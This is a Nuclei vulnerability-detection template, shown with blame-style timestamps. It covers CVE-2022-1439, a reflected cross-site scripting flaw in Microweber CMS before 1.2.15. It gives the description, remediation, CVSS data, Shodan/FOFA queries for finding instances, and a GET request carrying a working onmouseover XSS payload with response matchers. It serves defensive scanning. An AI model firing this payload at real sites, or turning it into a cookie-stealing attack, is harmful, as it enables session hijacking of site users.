2022-05-06 09:56:54 +00:00
id : CVE-2022-1439
info :
2022-09-16 19:50:10 +00:00
name : Microweber <1.2.15 - Cross-Site Scripting
2022-05-06 09:56:54 +00:00
author : pikpikcu
2022-09-16 20:03:07 +00:00
severity : medium
2022-09-16 19:50:10 +00:00
description : Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade to Microweber CMS version 1.2.15 or later, which includes proper input sanitization to mitigate the XSS vulnerability.
2022-05-06 09:56:54 +00:00
reference :
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/
2022-05-17 09:18:12 +00:00
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0
- https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8
2022-09-16 19:50:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1439
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/cvemon
2022-05-06 09:56:54 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-1439
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2023-11-14 05:56:48 +00:00
epss-score : 0.001
2024-05-31 19:23:20 +00:00
epss-percentile : 0.41295
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
2022-05-06 09:56:54 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : microweber
product : microweber
2023-09-06 11:59:08 +00:00
shodan-query : http.favicon.hash:780351152
2024-05-31 19:23:20 +00:00
fofa-query : body="microweber"
2022-08-27 04:41:18 +00:00
tags : cve,cve2022,microweber,xss,huntr
2022-05-06 09:56:54 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-06 09:56:54 +00:00
- method : GET
path :
- '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}'
matchers-condition : and
matchers :
- type : word
part : body
words :
- "<div class='x module module-'onmouseover=alert(document.domain) '"
- "parent-module-id"
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4a0a00473045022077fb78e1d57a16ddb887a6a9837496912e761370f4a9abd87b5637c0dec12e70022100b823ada2865084a8ab3d5756301378e0457faa2e768266e34f1fb8ab9682ee9f:922c64590222798bb761d5b6d8e72950